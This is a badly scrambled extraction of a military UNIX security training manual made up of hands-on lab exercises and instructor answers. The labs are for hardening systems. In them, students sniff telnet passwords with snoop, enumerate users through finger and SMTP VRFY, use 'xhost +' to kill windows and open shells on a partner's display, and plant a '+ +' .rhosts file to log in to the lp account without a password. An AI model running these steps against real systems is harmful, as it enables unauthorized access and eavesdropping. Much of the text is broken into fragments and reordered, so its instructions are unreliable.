22.  Take a look at another unnecessary port.  Type:  # telnet‸localhost‸7 

a. Type:  enter 
 
 b. Type:  quit 
 

19.  Go look at what can be gain
 

a.  It wo
learn? 

 __________________________________________________________________ 
 
20.  Go look at what can be gained by going to port 79.  This is port for finger. 
 

 
_________________________________________________________________ 

21.  Go look at what port 25 has to offer.  This is the port for SMTP. Port 587 is the submission 

 a.  What did you learn? 
 
 __________________________________________________________________ 
 
 
 

 Do you see some comman

 
 d.  Type: vrfy‸labuser2 
 

e.  Type:  ‸  

verify or identify valid users on a system. 
 

 

 
 

Kelly Larsen
Your access control has been removed.  It indicates that the when the Xwindow session starts up, it denies all.

Kelly Larsen
The access control can be turned on or off with the xhost command

Kelly Larsen
The partner computer

Kelly Larsen
nothing listed
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c.  See how the port repeats what it gets.  This is the echo service.  It doesn't serve much 
purpose and is liable to utilize large amounts of process time when given large amounts of 
data to repeat.   

 
d.  Type:  ^]    

 1.  The above command is the control-right bracket combination 
 
 e.  To get out of the telnet prompt ">", type:  ^D 
 

a.  Seems like you've tapped into a treasure trove of useless data.  This is the character 
rting to 

show red.  What do you think would happen if you redirected this output to your port 7?   
________________________________________________________________________ 
 

 

27.  If you are not back to the # prompt, you can tray various combinations of the above control 
haracters or close and reopen your window. 

28.  Let'

 
Choices:  Port 7, 13, 19, 21, 25, 79 

 
 a.  The port that told us what time zone the computer was in was?  ____________ 

_____ 
 
 c.  The port that took data and repeated it was?  ___________________________ 

d.  The port that tied up our processor was?  ______________________________ 
 
 e.  The port that helped us determine if the computer was a mirror site was? _____ 

s? _____ 

 h.  The port that told us our operating system was?  ________________________ 
 

 
 
 

23.  Another seemingly harmless port is 19.  Type:  # telnet‸localhost‸19 
 

generator service.  You should notice that the CPU meter on the bottom right is sta

24.  To stop the data flow, type:  ^C 
 
25.  Type:  ^] 

26. To get out of the telnet prompt ">", type:  ^D 
 

c
 

s summarize what we've learned from these unnecessary ports by matching the correct fact 
with the port that we visited. 

 
 b.  The port that told us who was logged onto the system was?  __________

 
 

 
 f.  The port that told us the version number of a often hacked program wa
 
 g.  The port that told us the machine name was?  __________________________ 
 

Kelly Larsen
this will vary as each student could have various combinations of terminal, file, etc. windows open

Kelly Larsen
This will vary on each computer

Kelly Larsen
The Xclock window should have closed

Kelly Larsen
A Xterm window should have opened on the partner identified by the -display value

Kelly Larsen
Partner A

Kelly Larsen
Partner A was rebooted

Kelly Larsen
It can allow unrestricted root access to just about anyone
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 i.  The port that helped us id all the users was? ____________________________ 
 

j.  What two ports could be used to tie up resources and create a denial of service attack? 

ed to capt

you sh g generated 
puters n the network.  
w of th the 

ld ping
nts an type “(“ 

capture

cap‸(pa

 _________________________________________________________________ 
 
29.  Lets take a look at the traffic on the wire utilizing the "snoop" utility that is provided with 

olaris 8/9.  Snoop is a tool that really has no basis for existence as System Administrator’s should S
not be analyzing traffic in this manner.  Utilize your partnership from earlier in the PE to complete 
these steps. 
 
30.  Both partners ne
 
31.  After a slight delay 
by your classmate's com
Type: # ^c to stop the flo
format. 
 
32.  Partner B now shou

(some IP represe
or “)” ) 

33.  Partner A will now 
        
34.  Type:  # snoop‸-o‸

Example

ure some network traffic.  Type:  # snoop 

ould see quite a bit of packet information.  This is bein
.  Your network card is capturing all broadcast traffic o
data.  Take a couple of seconds to familiarize yourself wi

 another computer in the room.  Type: # ping‸-s‸(some IP) 
IP number, ping –s sends that IP a ping each second, do not 

 the traffic between the two computers in a file called cap.  

rtner B IP)‸SOME IP 
:  sn

 (this captures t
35.  Partner A should
A has received a c
 
36.  Partner A can no
 (this

oop –o cap 14
he traffic e called cap) 

 see a littl command line increase numerically.  When Partner 
omfortable a  

w examin
 allows you to view

37.  You should see the ping (I  
packets of another type.  Do yo
 
38.  Partner A can now examin ou 
may substitute the number 16 f .  Type:  # snoop‸-i‸cap‸-v‸-p16 
(Notice the nice breakdown of the packet information) 
 
39.  If you like, reverse your roles s
 
40. Let’s see if a regular us  can ow users.  Both partners ype: # exec‸ 
login 
 
41. Enter labuser1 for login an
 

e password and hit enter 
 

7.51.217.151 147.51.217.166 
 between your partner and the IP they pinged in a fil
e counter on the 
mount of packets (over 40), both partners need to type : # ^C

e the packets.  Type:  # snoop‸-i‸cap‸-p‸0,40 
 the first 40 packets of the file cap) 

CMP) packets between the two machines.  You may see a few
u see the echo requests and echo replies? 

e the details on any packet.  This script looks at the 16th packet.  Y
or any of your packet numbers

o both partner can capture traffic. 

 use snoop to spy on felle

d hit enter 

42. Enter student1 for th

Kelly Larsen
no, no, everyone from everywhere
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oop 

re you

our permissions, type:  $  ls‸ –l‸ /dev/iprb0 

 outcome?  Is this a link? _______________________________________ 

rget of the 
 

 will very m

43. Type :  $  sn
 
44. Did it work or we
 
45. Check out y
 
46. What was the
 
47. Check the ta

/devices/pci@0,0/pci8086,244e@1e/pci8086,50@2:iprb0

 denied permission?  _____________________________ 

link, type:  $  ls‸ –l‸ 

*Link targets fro  system to system* 

n the actual network 
 

48. What are the permissions o
adapter?_______________________________ 

 
49. Snoop needs to be deleted 
 
50. Return to the root accou ,
 
51. Type root at the login prompt and hit enter 
 
52. Type student at the password prompt and hit enter 
 
53. The terminal window will 
 
54. End of PE. 
 
 

or disabled.  Is it disabled for user use?  ___________ 

nt  type:  $ exec ‸ login 

close and you will be back at root 



PRACTICAL EXERCISES 
C2 PROTECT/SYSTEM ADMINISTRATOR AND NETWORK MANAGER SECURITY 

 

1-218 

Practical Exercise SAS 8B
EXERCISE B 

Secu
 
The following steps will take you through a demonstration on how Secure Shell (SSH) protects 

our communications from prying eyes (snooping).  The PE is designed around working in groups 
 3, 2 is acceptable.  Two (partner A and C) will be setting up telnet sessions and SSH sessions.  
he third team member (partner B) will be the man in the middle, snooping the traffic between the 

m their respective tasks in order to avoid incorrect results.  Bold 
print identifies what needs to be typed.   The  ‸ symbol identifies where a space needs to be. The 
entry <enter> means enter key and the <ctrl-d> and <ctrl-c> stand for control key sequences. 
 
Here are some of the scripts you will be using: 
 
snoop‸ –o ‸cap‸ (partner A IP) ‸ (partner C IP)         -Snoop will scan for traffic between 
        the two ips and put the captured  
        packets in a file called cap.  
snoop‸ –i‸ cap      -this will read the contents of cap 
snoop‸ –i‸ cap‸ –v ‸–p ‸ (packet#)   -this will analyze a selected packet 
 
1.  Partner B will set up the traffic intercept.   
At the # prompt, type:  snoop ‸–o ‸cap‸ A-IP‸ C-IP 
 Example:

 

 
 

re Shell Practical Exercise 

y
of
T
other two.  Partners need to perfor

  snoop –o cap 147.51.217.151 147.51.217.153 
 
2.  Partner A will connect to partner C 
At the # prompt, type:  telnet‸ C-IP 
 
3.  Partner A will then log in to partner C’s computer utilizing the labuser2 account and password 
of student2 
 
4.  Partner A will type at the $ prompt:  who 
 
5.  Identify the root login at either pts/4 or pts/5.  We are going to type a message to partner C.   
6.  At the $ prompt, type:  write‸ root‸ (pts/4 or pts/5) 
 Example:  write root pts/4 
The prompt will be a line without a prompt.  On this line type:  Unix is a wonderful operating 
system 
Partner A hit the <enter> key and then hit <ctrl-d> 
 
7.  Partner A should see the message print on partner C’s computer.  Partner B should be seeing a 
packet counter on partner B’s screen continue to climb numerically.  Partner B hit <ctrl-c> and 
stop the capturing of packets. 
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t history by reading the file called cap.   

t, type:  snoop‸ –i ‸cap 
.  Partner B should see a printout of all the packets that A and C exchanged.  Notice that to the 

right you see the ASCII values of some of the packets.  Do you see the message partner A typed?  
__________________________.  Do you see the attempts for the typing to be echoed back to 

artner A from partner C?  _______________________.  Can you see the password “student2” laid 
  ________ 

lowing script.  At the # 
prompt, type:  snoop ‸–i ‸cap ‸–v ‸–p‸ (packet #) 
 
11.  Do you see the breakdown of the packet?  ____________________________ 
 

2.  Partner A can disconnect from partner C now.  At the $ prompt, type, exit 
 
13.  Partner B can now set up capturing again, this time between partner C and partner A.  Their 

les will be reversed.   
4.  Partner B at the # prompt, type:  snoop ‸–o ‸cap2‸ C-IP‸ A-IP 

artner C at the # prompt, type:  su‸ labuser2 

16.  When prompted for the password, partner C will type:  student2 
 
17.  Partner C will type at the $ prompt:  who 
 
18.  Partner C identify the root login at either pts/4 or pts/5.  We are going to type a message to 
partner A.   
19.  At the $ prompt, type:  write‸ root‸ (pts/4 or pts/5) 
The prompt will be a line without a prompt.  On this line type:  Unix is a lot better than the 

indows operating system 
it the <enter> key and then hit <ctrl-d> 

1.   Vi called cap2.   
Partner B at the # prompt, type:  snoop‸ –i ‸cap2 
 

8.  Partner B can view the packe
At the # promp
9

p
out vertically in packet sequence?
 
10.  Partner B can pick a packet at random and plug its number into the fol

1

ro
1
 
15.  Partner C will now set up a secure shell connection to partner A 
P
Partner C at the $ prompt type:  ssh‸ (partner A IP) 
If prompted about the RSA key, ignore it by typing yes and hitting <enter> 
 

w
H
 
20.  You should see the message print on partner A’s screen.   Partner B should be seeing a packet 
ounter on partner B’s screen continue to climb numerically.  Partner B hit <ctrl-c> and stop the c

capturing of packets. 
 
2 ew the packet history by reading the file 

gvh
UNIX PE2 EXA Q3A.  At a minimum, disable in.rshd, in.rexecd, and in.rlogind.  Most of the time all r-command daemons should be deleted or disabled.  The method to disable the r-command would depend on how the command is initiated.  If the command (daemon) is initiated in the /etc/inetd.conf file then the command should be commented out or deleted from the /etc/inetd.conf file.  If the command (daemon) is initiated in the rc’s then the rc script should either be modified or renamed.  In addition to not allowing the daemon to start, the program which allows an account to execute the command out of the box needs to be deleted, have the permissions changed or renamed.


gvh
UNIX PE2 EXA Q4A.  The services that are started via the /etc/inetd.conf file are ftp, telnet, shell, login, exec, comsat, talk, uucp, time, finger, echo, and daytime.


Kelly Larsen
shell, execute, login
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2.  Partner B should see a little bit different output than before.  The packet capture doesn’t show 

into the following script.  At the # 

he previous telnet capture showed plaintext telnet lines that are now gone. 

25.  Partner C can disconnect from partner A now.  At the $ prompt, type, exit 
 
26.  W
running
_____

2
any of the ASCII value text and there is additional sequence and coding numbers.   Do you see any 
of the previous ASCII values?  _____________________ 
 
23.  Partner B can pick a packet at random and plug its number 
prompt, type:  snoop ‸–i ‸cap2 ‸–v ‸–p‸ (packet #) 
 
24.  Do you see the breakdown of the packet?  ____________________________ 
Notice that t
 

hat conclusion do you come to when confronted with the question, “what is the benefit of 
 secure shell over telnet?” 
__________________________________________________________________ _

 
 
 
 

27. END OF PE 
 
Secure Shell   (ACERT APPROVED) 
Secure  network, to execute 
commands in the remote  machine, and to move files from one machine to another.  It 
provides strong authentication and secure communications over insecure channels.  It is a 
suggested replacement for telnet, rlogin, rsh, ftp, and rcp.   
 

ecure Shell can be used to tunnel remote X sessions, do secure network backups,  and 
remote administration. 

 DA Msg 050951ZMar99, all unencrypted root account access must take place 

 Shell (ssh) is a program used to log into another computer over a

S

 
USE the Secure Shell (ssh) program to replace telnet, rlogin (remote login) and rsh 
(remote shell).  Secure shell is a suite of utilities which utilize port 22 to set up  
public key encrypted remote access.  It packages with a secure shell daemon 
(sshd) which handles all the connections, a secure shell program (ssh), a secure 
copy program (scp), a secure login program (slogin), and a secure ftp program 
(sftp). 
 

NOTE:  IAW
on the physical console.  Secure Shell is an ACERT recommended commercial product and 
can be obtained at: 
http://www.ssh.org 
 
There is also a free version of SSH. It can be obtained at: 
http://www.openssh.com/ 
 

gvh
UNIX PE2 EXA Q8A.  The message should have been “Unable to connect to remote host: Connection refused”
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ractical Exercise SAS-8C 
 
EXERCISE C 
 
The purpose of this PE is to familiarize you with Unix's main scheduling utility.  "cron" is a 
hronological scheduler that allows you to run programs or scripts unattended.  Commands to type 
re written in bold.  Only type what is in bold.  The ‸ symbol indicates where you put in a space.   

ems.  If you use it you have “cron jobs” pending 
r in the works.  To use cron, you edit the cron Table.  Type crontab with one of the following 

-d (kills all cronjobs) 
 

1.  Make sure your system date is correct.  Type:  # date 

3. Check date again by typing:  # date 
 
4.  Open up the cron Table for editing by typing:  # crontab‸-e  
 

a.  The format for a cronjob is minute, hour, date, month, day, file or script.  Separate entries 
with a space. 

.  Go down to the last line of the cron jobs and create a new line to run a script that hunts for user 
he 

ot directory called "trusts". 

a.  Type:    55‸10‸*‸*‸*‸find‸ /‸-name‸.rhosts‸>‸/trusts 
 

6.  Click on "file" and select "save (needed)".   
 
7.  Close the editor.  Your script should now be set to run at 10:55am everyday. 
 

P

c
a
 
Cron is the scheduling utility of choice on unix syst
o
flags: 

-e (edit) 
-l (list) 
-r (remove) 

 
2.  If the date and time is incorrect, you can reset it by typing:  # date‸nnddhhmm 
 

a.  nn = month 
b.  dd = day 
c.  hh = hour 
d.  mm = minutes 
 

 
5
created ~/.rhosts files.  Make the script so that it runs every day at 10:55am and saves to a file in t
ro
 

gvh
UNIX PE2. Q10A.  The message should have been “tcp/telnet: Unknown services”.  Yes, the message is different when the service was disabled in step 5, the connection was made but since the inetd was not configured to answer telnet requests, the connection was refused.  In this step the port has been shutdown.


gvh
UNIX PE2. Q11A.  No hosts.equiv file was found on the system.  A hosts.equiv file is required when a trust is to be established between the local system and some other system.


gvh
UNIX PE2. Q12A.  No .rhosts files exist on the system.  If a .rhost file did exist, a specific account would be establishing a trust with another computer, possibly another user.  Methods to increase the vulnerability from .rhosts files include, but are not limited to, (1) create a .rhost file in the user’s directory owned by root and modifiable only by root; (2) use cron to search for .rhosts file each night and destroy the files; (3) train user’s the vulnerability of .rhosts files.
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8.  Use of the cron utility is controlled through cron.deny and cron.allow files.  Take a look at the 
cron.deny file.   

a.  Type:  # cat‸/etc/cron.d/cron.deny 

9.  Are
 
10. Lets add labuser1 and labuser2 to the cron.deny file. 

with changes. 
 

2.  Double-check your changes.  Type:  # cat‸/etc/cron.d/cron.deny 
 
13.  A cron.allow file is not normally created.  Check for its existence. 
 
 a.  Type:  # cat‸/etc/cron.d/cron.allow 
 

b.  A cron.allow file is usually used when all users are included in the cron.deny file.  The 
 use cron.  The system reads the cron.allow 

 
4.  En

 
 any of the normal users listed?  __________________________________ 

 
 a.  Type:  # dtpad‸/etc/cron.d/cron.deny 
 
11. The users listed cannot use cron.  On a line by themselves, add both labuser1 and labuser2 to 

e bottom of the list. th
 
 a.  Click on "file" and select "save (needed)" to save the list 

1

cron.allow would allow only the users listed to
file prior to the cron.deny file.  Do not be surprised if you do not have one by default. 

d of PE. 1

gvh
UNIX PE2. Q14A.  No, one was not able to login to the lp account.  The lp account is a system account and system accounts do not have passwords and therefore the login can not authenticate the user.


Kelly Larsen
We have a umask of 077 in effect which only allows for owner read permission.
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EXERCISE D 
 
Purpose:  Show the dangers of X-Windows.  Hackers can exploit your X-Windows sessions in 
various ways.  
 

.  Pair up the students so that they are in groups of two.  Select one to be partner A and one to be 
partner B. 

.  Have the students log in as root and open a terminal window (Bourne shell is fine). 

.  Have each student type: # xhost ‸+ 
ess control lists.  What does it indicate to you?   

________________ 

___________ 

6.  Notice what the computer tells you about acc hat does it indicate to you? 
______________________________________________________________________ 
 
______________________________________________________________________ 

7.  Have each student type:  # xhost‸+(IP of partner computer)   
"example:  #xhost‸+147.51.217.157" 

8.  Have each student type:  # xhost 
9.  Who is listed in your access control list for the Xserver? 
 
_____________________________________________________________________ 
 

12.  W Xserver? 
 
_____________________________________________________________________ 
 

4.  Have partner B start a program on his computer.  Type # xclock‸& 
15.  Partner A will type # xlsclients‸-a‸-l‸-display‸(partner-B-IP):0    

"example:  #xlsclients -a -l -display 147.51.217.155:0" 

Practical Exercise SAS-8D 

1

2
3
4.  Notice what the computer tells you about acc
_______________________________________________________
 
______ ______________________________________________________
 
5.  Have each student type: # xhost ‸- 

ess control lists.  W

 

10.  Have each student type:  # xhost‸-(IP of partner computer) 
"example:  #xhost -147.51.217.157" 

11.  Have each student type:  # xhost 
ho is listed in your access control list for the 

13.  Have each student type:  # xhost‸+ 
1

gvh
UNIX PE2. Q19A.  Yes, the log-in was successful.  The output of the id command was uid=71 (lp) and gid=8.  The use of a .rhosts file is a security risk because it defines trusts between other hosts, users or both.


gvh
UNIX PE2. Q22A.  No, the lp account does not have a valid shell identified – no starting shell is identified for the lp account.  The lp account should not be capable of “loggin-in”.  We were able to log-in in the previous step because the rlogin command does not authenticate the user.  


gvh
UNIX PE2. Q23A.  The usermod –s option added a shell definition to the lp.  The /bin/false shell effectively disables the account from being capable of login.


gvh
UNIX PE2. Q24A.  The lp account now has a valid startup shell identified.
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 the clients (open windows) open on your partners machine. 

 
____________________________________________________________________ 
 
____________________________________________________________________ 
 

7.  You will see that the all the windows that are open on partner B's computer have an ID 

______________ 
 
18.  Partner A type # xkill‸-id‸(xclock ID from question 17)‸-display‸(partner-B-IP):0 

"example:  #xkill -id 0x40000040 -display 147.51.217.155:0" 
19.  What happened on your partner B's display? 

_________________________________________________________ 

20.  Have partner A type: # xterm ‸(
"example:  #xterm -display 147.51.217.155:0" 

_________________________________________________________________ 
 
_________________________________________________________________ 
 
22.  Have partner B click on the xterm window and type # cat‸/etc/hosts and hit enter .  Did the IP 

in the hosts file match the IP of partner A or partner B? 

24.  What happened? 
 

25.  What does this tell you about the potential danger of xhost files? 

_______________________________________________________________ 

________________________________________________________________ 
 

16.  Record the names of

___________________________________________________________________ 
1

(0x???????????).  What is the window ID for the window named xclock? 
 
____________________________________________________

 
__________________________________________________________________ 
 
_________
 

‸-display partnerIP):0 

21.  What happened to the partner B's screen? 
 

 
_________________________________________________________________ 
 
23.  Have partner B type # reboot and hit the enter key. 

________________________________________________________________ 
 

 
_
 

gvh
UNIX PE2. Q26A.  No.  the rlogin command was not successful.  The result of the id command are uid=1001 (labuser1) and guid=10 (staff).  The login was not successful because the lp account does not have an authorized shell.  The message received is Connection Closed.


Kelly Larsen
The trust will not function and you should receive a prompt to supply a password.   By editing the /etc/pam.conf file, you tell the login() function to no longer check for .rhosts files during the login process.

gvh
UNIX PE2. Q26B System accounts can be secured from the trust enabled in .rhosts files by setting the system account’s startup shell to be /bin/false or /dev/null.  All .rhosts logins can be disabled by editing the /etc/pam.conf file.
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re you ever prompted for a password?  Did 
you have to utilize a .rhosts or hosts.equiv file?  Who does the "xhost"‸+ command allow 
Xserver access to? 

________________________________________________________________________________ 
 
________________________________________________________________________________ 

_______________________________________________ 

26.  When communicating with your partner's screen we

 
_________________________________
Security and the X Window System  

Vulnerability Countermeasure 
The

commands for display 
lsewhere, and remap 
eyboard to use 
efarious commands 

not matter what the 
user types. Most 
problems stem from a 
weak access control 
paradigm. 

ither a host-
 method. The 

 the discretion of the 

osts 
registered in the /etc/Xn.hosts file 
have users that can be trusted, where 
"n" represents your X server’s 
number.  
This may not be possible at every site, so a better method is 
to educate each and every user about the security implications 
of the references below. Better still, when setting up a user, 
give them a set of X security related template files, such as 
.xserverrc and .xinitrc. These are located in the users home 
directory.  
You are strongly advised to read the section on X window 
system security referred to in the X Window System 
Administrators Guide (C.4).  
 
�1.  IAW HQ DA SAIS-IAS message DTG R 050951Z MAR 

99, disable xhost and chroot applications and any other 
application or process that uses a setuid to root upon 
execution on all servers 

 
�2.  Xwindows uses TCP ports 6000-6063.  Blocking these 

ports will stop outside access. 

 major problem 
with X is that its Access to your X server may be 
security model is an all controlled through e
or nothing approach. 
Once a client is granted based or user-based
access to an X server, 
pandemonium is former is left to
allowed. X clients can 
capture the keystrokes 
of the console user, kill 

Systems Administrator at your site 
and is useful as long as all h

windows, capture 

e
k
n

 
Problems with xdm. 

Vulnerability Countermeasure 
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xdm bypasses the 

h means 
that quotas for the user, 

possibly other 

ut in place by you 
may be ignored. 
 
Refer to CERT Vendor-
Initiated Bulletin VB-95:08 
 

NOTE:
normal getty and login 
functions, whic

ownership of 
/dev/console and 

preventive measures 
p

 Release 6 of X11 is now available and solves many 
roblems associated with X security which were present in 

previous releases. If possible, obtain the source for R6 and 
compile and install it on your system.  

It is available from: 
/R6/*ftp://archie.au/X11/contrib/*

p

X11R6  
 

ftp://archie.au/X11  or 
ftp://ftp.x.org/pub/R6/* 
�1.  Secure XWindows 
• DO NOT permit access from arbitrary hosts.   
• Remove all instances of the ‘xhost +’ command from the 

system-wide Xsession file, from user .xsession files, and 
from any application programs or shell scripts that use the 
X window system.  

• If you must allow access to your X server, specify each 
server by IP address. Keep in mind that any user on that 
server can connect to your X server and snoop away. 

• DO use xauth to replace xhost.  If you use ssh, the 
xauth is automatic. 

• READ the manual pages for xauth and Xsecurity. Use 
this information to set up the security level you require.  

 
• USE the X magic cookie mechanism MIT-MAGIC-

another machine, use the xauth command in preference to 
the xhost command.  

 

SUN-DES-1: Based on Sun's Secure RPC system 
MIT-KERBEROS-5: Kerberos version 5 user-to-user 
 
• ENSURE that the permissions on /tmp are set to 1777 (or 

drwxrwxrwt), i.e., the sticky bit should be set. The owner 
MUST always be root.  If the sticky bit is set, no one 
other than the owner can delete the file /tmp/.X11-
unix/X0, which is a socket for your X server. Once this 
file is deleted, your X server will no longer be accessible.  

Set ownership and permissions for /tmp correctly  
# chown root /tmp  
# chmod 1777 /tmp 

NOTE: This will NOT recursively set the sticky bit on sub-

COOKIE-1 or better. With logins under the control of 
xdm, you can turn on authentication by editing the xdm-
config file and setting the DisplayManager*authorize 
attribute to true. When granting access to the screen from 

MIT-MAGIC-COOKIE-1: Shared plain-text 
"cookies" 
XDM-AUTHORIZATION-1: Secure DES based 
private-keys 

Kelly Larsen
auth_sys
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directories below /tmp, such as /tmp/.X11-unix and 
/tmp/.NeWS-unix; you may have to set these manually. 
 

This forces the system to use magic cookies for 

0 -d 0.0.0.0/0 
6000:6063 

Linux Note:  Start the xinit program with the -auth argument.  

authentication.  Another solution is to use ipchains.  # 
ipchains -A input -p tcp -j DENY 0.0.0.0/

 

 

Kelly Larsen
labuser1 and labuser2


Kelly Larsen
login incorrect, login failed
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Practical Exercise SAS-8E 
EXERCISE E 
 

URPOSE:  To give students familiarity with the UNIX default network services & to understand 

g in as root. 

Where are the remote daemons that allow the use of "r-commands"? 

2. At the command prompt #, type:  find  /usr/sbin  –name  “in.r*” >  rcmds 
  
3. At the command prompt #,  type: cat  rcmds 
 
 

3A. Which r-command daemons do you want to delete or disable?  How could you do this? 
 

P
the security implications in Section 3.0 of the UNIX checklist 
 
1. If you are not logged in as root, lo
 

 

 
 
________________________________________________________________________________ 

nerabilities i h 
ntly runnin

ommand prompt #, t

preced d by a # symbol is a service that is running on this computer.  The 

 
 
The greatest vul
services are curre
 
4. At the c

n your system are network services. You need to know whic
g on your system. 

ype:  dtpad  /etc/inetd.conf 
 

4A. Any line not 
first

e
 word on each line is the name of the service.  The second column tells you the type of socket.  

The third column tells you protocol.  The fourth column tells you the wait status.  The fifth column 
ID that it runs as Ttells you the U .  he sixth column tells you the full path to the actual dae

you to specify arguments.  What are some of the services th
what name do in.rshd, in.rexecd, and in.rlogind go by

mon 
program.  The last column allows at are 
currently running by default?.  By ? 
 
 
 
________________________________________________________________________________ 
 
________________________________________________________________________________ 
 

Most of these services are unnecessary. 

Kelly Larsen
no,  you get in
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5. Disable the telnet service only. ervice, comment it out by placing the # symbol 
t the beginning of the line that contains the service you wish to disable.  When done, save the file 

(File>Save) and exit the dtpad program (exit the Text Editor Window by placing the cursor on the 
title bar; pressing the right mouse button and selecting Close). 
 
NOTE:  Commenting out services in the inetd.conf DOES NOT

  To disable this s
a

 automatically terminate these 
services.  You must stop the inetd daemon, and then restart it, so the new configuration file is 
initialized. 

t the command prompt #, type:  ps  –ef  | grep  inetd 
Write down the [PID of inetd].  The PID is found in the second column of the line with the 

two columns of numbers, it will be the left one. 
 
 

In the next step terminate the inetd daemon and then restart it. 
  
6. A

/usr/sbin/inetd filename at the end.  Of the 

 
 
 
 

kill –HUP  [PID of inetd in step 6 above] 
ent which stops and restarts a service) 

 
8. Let’s try to telnet. 

telnet localhost

essage received. 

7. At the command prompt #, type:  
 (HUP is a hang-up argum

At the command prompt #, type:   
 
8A. Write down m

 
 
 
________________________________________________________________________________ 

 If you did not receive an error message when the telnet command was executed then the kill 
uted in step 7 did not work correctly.  To ensure the inetd has read the updated 
ype: kill –9 [PID of inetd], then at the command prompt, type inetd –s.  This will 

restart the inetd daemon using the modified configuration file.  Try step 8 again.  A word of 
 is NOT t may be 

/inetd.conf, you on a 
/etc/services file li rvice name., port 

pt #, type:  d  /etc/services 

(Note:
command exec
/etc/inetd.conf t

caution—using kill –9
necessary.) 
 
In addition to the /etc
specific port.  The 
number/protocol. 
 
9. At the command prom
 

 the recommended way to restart processes, however, i

 can edit the file that specifies which service runs 
sts the available ports by se

tpad

Kelly Larsen
should have seen labuser2 info

Kelly Larsen
The change should be in the labuser2 GECOS portion of the /etc/passwd file 

Kelly Larsen
the connection should have been refused if you went to the /etc/inetd.conf and commented out the finger information

Kelly Larsen
yes

Kelly Larsen
yes

Kelly Larsen
disable the command itself with file permissions
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e same service that you specified in STEP 5 (telnet).  Add the # symbol to 
f the line th  the 

file and exit the dtpad program
 
10. Let’s try to telnet. 

At the command promp
10A. Write down the m ceived 
when the services had s ted ? 

 
 

Comment out th
the beginning o at contains the service you wish to disable. When done, save

.   

t #, type:  telnet  localhost 
essage received.  Is the message different from the message re
imply not been star

 
_____________________________________________________________________________ 
 
 
Just as in NT, UNIX also has the ability to establish trust relationships.  However, it is more 
dangerous in UNIX because every user can establish a trust.  First let’s determine if the 
administrator has set up a trust. 
 
11. At the command prompt #, type:  ls –l  /etc/hosts.equiv 

11A. Does a hosts.equiv file exist on the system?  When is a hosts.equiv file allowed?   

_______________________________________________________________________________ 
 
________________________________________________________________________________ 

ressed the fact that the system administrator may establish a trust.  UNIX 
Y user to establish a trust with any other user, either internal or external. 

e creation of a .rhosts file.  

 files 
mpt #, type

sts fil e system?  What would it mean if a .rhosts file did 
 methods to increase security from the vulnerability associated with .rhosts 

files? 
____________________________________________________________________________ 

_____________________________________________________________________________ 
 
_____________________________________________________________________________ 
 
13. Switch user

 
_

 
In STEP 11, we add
will also allow AN
This is done through th
 
Do you have any .rhosts
12. At the command pro
 

12A. Do any .rho
exist?  Name 2

in your system? 
:  find  /  -name  .rhosts  

es exist on th

_
 

 to the labuser1 account.  At the command prompt #, type:  su labuser1 
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Now let’s try to compromise a default system account.   

and prompt $, type:  rlogin  -l lp localhost  
(NOTE:  The lp account does not have a password. When asked for a password, abort the 
rlogin attempt by typing a Ctrl-D.) 

 
14A. Are you able to log in as lp?  Why ? 

15. At the command prompt $, type:  exit 
This should put you back as ‘root.’ (NOTE : the # prompt) 

 

Create a .rhosts file in the lp home directory. 
16. At the command prompt #, type:  dtpad  /usr/spool/lp/.rhosts 

Enter the following line as the first line: 
 

+  + (The line should be a plus sign followed by a space, followed by a plus sign., followed 
by pressing the enter key) 

 
 

 window by placing the cursor on the title bar; pressing the right mouse 
button and selecting Close 

 
Now change the owner of the file to lp.  For a .rhosts file to work, the directory owner must 
have at least read permission on th
17. /lp/.rhosts 
 
 17A.  Why did lp not have read permission on the file prior to changing ownership? 
 
 __________________________________________________________________________ 
 
Let’s try to compromise the lp account 
 
18. At the command prompt #, type:  su  labuser1 

 

 
14. At the comm

 
______________________________________________________________________________ 
 
______________________________________________________________________________ 
 

Save the file (File>Save). 
Close the text editor

e file. 
 At the command prompt #, type:  chown  lp /usr/spool
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Now try to rlogin to the lp account. 
 
19. At the command prompt $, type:  rlogin  -l lp localhost 

19A. Were you able to log in?  (use the id command).  Why is use of a .rhosts file a security 
risk? What does the + + mean? 

 
_____________________________________________________________________________ 
 
____________________________________________________________________________ 

 
 
20. At  exit to quit the rlogin session. 
21. At the command prompt $, type: exit to quit the su labuser1 session. 

Remain logged in as root (NOTE : the # prompt) 
 
Let’s disable the lp account login by giving it a false shell.   
 

2. At the command prompt #, type:  cat  /etc/passwd 

es the lp account have an authorized shell? Should you be able to login as lp? 

_____________________________________________________________________________ 
 
_____________________________________________________________________________ 
 
23. At the command prompt #, type:  usermod –s  /bin/false  lp 

 
23A. What did you just do?  

_____________________________________________________________________________ 
 
_____________________________________________________________________________ 
 
24.  At
 

24A. What’s different about the lp account? 
___
 
______
 

5. At the command prompt #, type:  su  labuser1 

 

 

_

the command prompt $, type:

2
 
22A. Do

 

 the command prompt #, type:  cat  /etc/passwd 

__________________________________________________________________________ 

_______________________________________________________________________ 

2
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Now tr

26.
 

_____________________________________________________________________________ 
 
____________________________________________________________________________ 

 
7.  At the $ prompt type: exit   (this will put you back at root) 

28.  e shell from the lp account (hint in/sh  lp) 

conf file:  #   

rlogin and  # symbol in front of each line that has the rhosts 
uld look li  t  

auth sufficient pam_rhosts_auth.so.1 
auth s fi

am.conf file and

t the # prompt, type:  su la

 as yo did in step 26.  (hint:  rlogin  -l  lp localhost) 

 different this time as compared to step 26?  Why do you think you were prompted 

______________________________________________________________________________ 
 
______________________________________________________________________________ 
 
32. How can system accounts be secured from .rhosts logins? 

____________________________________________________________________________ 

____________________________________________________________________________ 

. At the command prompt $, type:  exit to quit the su labuser1 session. 

y to login as lp. 
 

 At the command prompt $, type:  rlogin  –l  lp  localhost 

26A. Are you able to login now? (use the id command)  Why or why not?  (NOTE : Look 
carefully at the messages from the rlogin) 

_

2
 

Remove the fals : # usermod -s /b
 
29.  Edit your pam.
 
30.  Locate the lines for 
reference.  They sho
different: 
 

#rlogin  
#rsh  
 

31.  Save the /etc/p
 
32.  A

  dtpad  /etc/pam.conf

 rsh.  Place a
ke his when you are done if using Solaris 9 (Solaris 8 is slightly

uf cient pam_rhosts_auth.so.1 

 close your editor. 

buser1 
 
33.  Try and rlogin again
 
34.  What was
for a password? 

u 

 

_
 
_
 
 

33
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Pluggable Authentication Module (PAM) 
PAM enables the authentication mechanism to be extended beyond UNIX passwords and to be both 
"stackable" and "tailorable" on a host- or application-basis using other authentication mechanisms like s/key, 

e written such that a user must pass multiple authentication schemes to 
n to authentication, PAM enables administrative customization of 

account management and session management.   PAM allows you to change on the fly your authentication 
ethods, requirements, and encapsulate all local authentication methods without re-compiling any of your 

